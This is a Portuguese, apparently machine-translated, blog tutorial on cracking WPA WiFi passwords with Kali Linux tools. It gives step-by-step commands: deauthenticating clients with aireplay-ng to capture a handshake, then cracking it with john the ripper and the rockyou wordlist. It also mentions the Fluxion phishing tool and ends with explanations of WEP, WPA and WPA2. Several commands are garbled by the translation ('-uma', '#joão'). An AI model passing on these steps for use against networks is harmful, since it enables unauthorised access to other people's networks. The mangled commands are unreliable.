Como Hackear Wifi Usando Kali Linux?

a maioria das perguntas no Google é como hackear Wifi usando Kali Linux , hackear wifi , Como hackear Wifi usando Kali Linux, etc. Mas em primeiro lugar entender o que é Wifi & sua criptografia.

publicar conteúdo

O Que É Wi-Fi e é possível hackeá-lo? Wi-Fi é o nome de uma popular tecnologia de rede sem fio que usa ondas de rádio para fornecer internet sem fio de alta velocidade e Conexões de rede. Um equívoco comum é que o termo Wi-Fi é abreviação de “fidelidade sem fio”, no entanto, esse não é o caso. Wi-Fi é simplesmente uma frase de marca registrada que significa IEEE 802.11 X.

quando falamos de hacking wifi de qualquer dispositivo, a segurança desse wifi é mais importante. Então, quando tentamos hackear o wifi, é muito fácil quebrar ou hackear a senha do sistema WPS disponível. WPS é um dos tipos de criptografia, que é usado para proteger a rede Wi-fi, então vamos começar com tutorial rápido.

Ferramentas Usadas Para Hackear a Senha do WiFi Em Kali-Linux

Principalmente nós usar kali Linux embutido conjunto de ferramentas para hackear a senha do wifi, que é o seguinte:

  • o airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

Este script pode ser usado para ativar o modo monitor em interfaces sem fio. Também pode ser usado para voltar do modo monitor para o modo gerenciado. Inserir o comando airmon-ng sem parâmetros mostrará o status das interfaces.

uso: o airmon-ng <start|stop> <interface> ou airmon-ng <check|check kill>

Aireplay-ng

Aireplay-ng é usada para injetar quadros.

a função principal é gerar tráfego para o uso posterior no aircrack-ng para quebrar as teclas WEP e WPA-PSK. Existem diferentes ataques que podem causar desautenticações com a finalidade de capturar dados de handshake WPA, autenticações falsas, repetição de pacotes interativos, injeção de solicitação ARP artesanal e reinjeção de solicitação ARP. Com a ferramenta packetforge-ng é possível criar quadros arbitrários.

a maioria dos drivers precisa ser corrigida para poder injetar.

Airodump-ng

Airodump-ng é usado para Captura de pacotes de quadros raw 802.11 e é particularmente adequado para coletar WEP IVs (Vetor de inicialização) para a intenção de usá-los com aircrack-ng. Se você tiver um receptor GPS conectado ao computador, o airodump-ng é capaz de registrar as coordenadas dos pontos de acesso encontrados. Além disso, o airodump-ng grava vários arquivos contendo os detalhes de todos os pontos de acesso e clientes vistos.

Hccap

para converter hashes de captura aircrack-ng em .hccapx usamos este comando.

John the Ripper

para quebrar a senha, usamos o john the ripper no estágio final. usamos essa ferramenta para comparar os hashes com o dicionário de senhas. Existem muitas outras maneiras, mas vamos tentar uma delas.

Aircrack-ng

Aircrack-ng é um conjunto completo de ferramentas para avaliar a segurança da rede WiFi.

concentra-se em diferentes áreas de Segurança WiFi:

  • monitorização: A captura de pacotes e exportação de dados para arquivos de texto para processamento posterior por ferramentas de terceiros
  • Ataque: ataques de Repetição, desautenticação, falsos pontos de acesso e outros, através de injeção de pacotes
  • Teste: Verificação de placas WiFi e capacidades do controlador (captação e injeção)
  • Fissuras: WEP e WPA PSK (WPA 1 e 2)

Passos Para Hackear WiFi Usando o Kali Linux, ou Com Qualquer Outro Debian Linux OS.

todos os comandos com descrição são fornecidos acima verifique se você tem algum problema.

Passo 1 :

primeiro, coloque sua placa de rede no modo monitor para monitorar as redes circundantes.

#airmon-ng start wlan1

1
2

#o airodump-ng wlan1mon

3
4

Passo 2:

#airodump-ng –bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon

5
6

Passo 3:

#aireplay-ng -0 0 -uma 2C:55:D3:B1:35:0C wlan1mon

7

depois de capturar com sucesso o arquivo handshak, vemos algo assim.

8

Passo 4:

#aircrack-ng kalip300-01.cap-J john

9

Passo 5:

#hccap2john john.hccap > wpa

Passo 6:

#joão –wordlist*/root/Desktop/rockyou.txt /root/Desktop/wpa

E nós sucsessfully hackear a senha do wifi por kali linux

wi-Fi Ferramenta de Hacking :- Fluxion

Fluxion é uma ferramenta de auditoria de segurança e pesquisa em engenharia social. É um remake de linset por vk496 com (esperançosamente) menos bugs e mais funcionalidade. O script tenta recuperar a chave WPA / WPA2 de um ponto de acesso de destino por meio de um ataque de engenharia social (phishing). É compatível com a versão mais recente do Kali (rolling). A configuração dos ataques do Fluxion é principalmente manual, mas o modo automático experimental lida com alguns dos parâmetros de configuração dos ataques. Leia o FAQ antes de solicitar problemas.

criptografia sem fio

criptografia WEP

Wired Equivalent Privacy (WEP) é um protocolo sem fio IEEE 802.11 que fornece algoritmos de segurança para confidencialidade de dados durante transmissões sem fio.

o WEP usa um vetor de inicialização de 24 bits(IV) para formar a cifra de fluxo RC4 para confidencialidade e a soma de verificação CRC-32 para integração da transmissão sem fio.

como o WEP funciona

  1. a soma de verificação CRC-32 é usada para calcular um valor de verificação de integridade de 32 bits (ICV) para os dados, que, por sua vez, é adicionado ao quadro de dados.

2. Um número arbitrário de 24 bits conhecido como Vetor de inicialização (IV) é adicionado à chave WEP; a chave WEP e IV são juntos chamados de semente WEP.

3. A semente WEP é usada como entrada para o algoritmo RC4 para gerar um fluxo de chaves (o fluxo de chaves é XOred bit-wise com a combinação de dados e ICV para produzir os dados criptografados).

4. O campo IV (IV + PAD + KID) é adicionado ao texto cifrado para gerar quadro MAC

 como WEP funciona

criptografia WPA

Wi-Fi Protected Access (WPA) é um método de criptografia de dados para WLAN baseado em 802.11 padrões.

é um instantâneo de 802.11 i (em desenvolvimento) fornecendo criptografia mais forte e habilitando o PSK para autenticação EAP.

como funciona o WPA

a chave de criptografia Temporal, o endereço de transmissão e o contador de sequência TKIP (TSC) são usados como entrada para o algoritmo RC4 para gerar keystram.

MAC Service Data Unit (MSDU) e message intergrity check (MIC) são combinados usando o algoritmo Michael.

a combinação de MSDU e MIC é fragmentada para gerar a unidade de dados do protocolo MAC (MPDU).

Uma versão de 32 bits do Valor de Verificação de Integridade (ICV) é calculado para o MPDU

A combinação de MPDU e ICV é bit a bit XORed com Keysteam Para Produzir os dados criptografados

IV é adicionado aos dados criptografados para gerar quadro de MAC.

criptografia WPA 2

o WPA 2 fornece ao usuário corporativo e WI-FI uma proteção de dados mais forte e controle de acesso à rede

fornece segurança de nível governamental implementando o algoritmo de criptografia AES compatível com o Instituto Nacional de padrões e Tecnologia (NIST) FIPS 140-2.WPA2 – Personal usa uma senha de configuração (chave pré-compartilhada) para proteger o acesso não autorizado à rede.

no modo PSK, cada dispositivo de rede sem fio criptografa o tráfego de rede usando uma chave de 128 bits derivada de uma senha de 8 a 63 caracteres ASCII.

WPA2-Enterprise

inclui EAP ou RADIUS para autenticação de cliente centralizada usando vários métodos de autenticação, como cartões simbólicos, Kerberos, certificados etc.

os usuários recebem credenciais de login por um servidor centralizado que devem apresentar ao se conectar à rede.

como o WPA2 funciona

na implementação CCMP do WPA2, os dados do cabeçalho Mac são usados para construir dados de autenticação additonal (AAD).

um número de pacote sequenciado (PN) é usado para construir nonce.

AAD, temporal key e nonce junto com CCMP são usados para criptografia de dados.

um quadro WPA2 MAC é construído usando cabeçalho MAC, cabeçalho CCMP, dados criptografados e microfone criptografado

 como WPA2 funciona

você pode perder Como hackear o telefone

Write a Comment

O seu endereço de email não será publicado.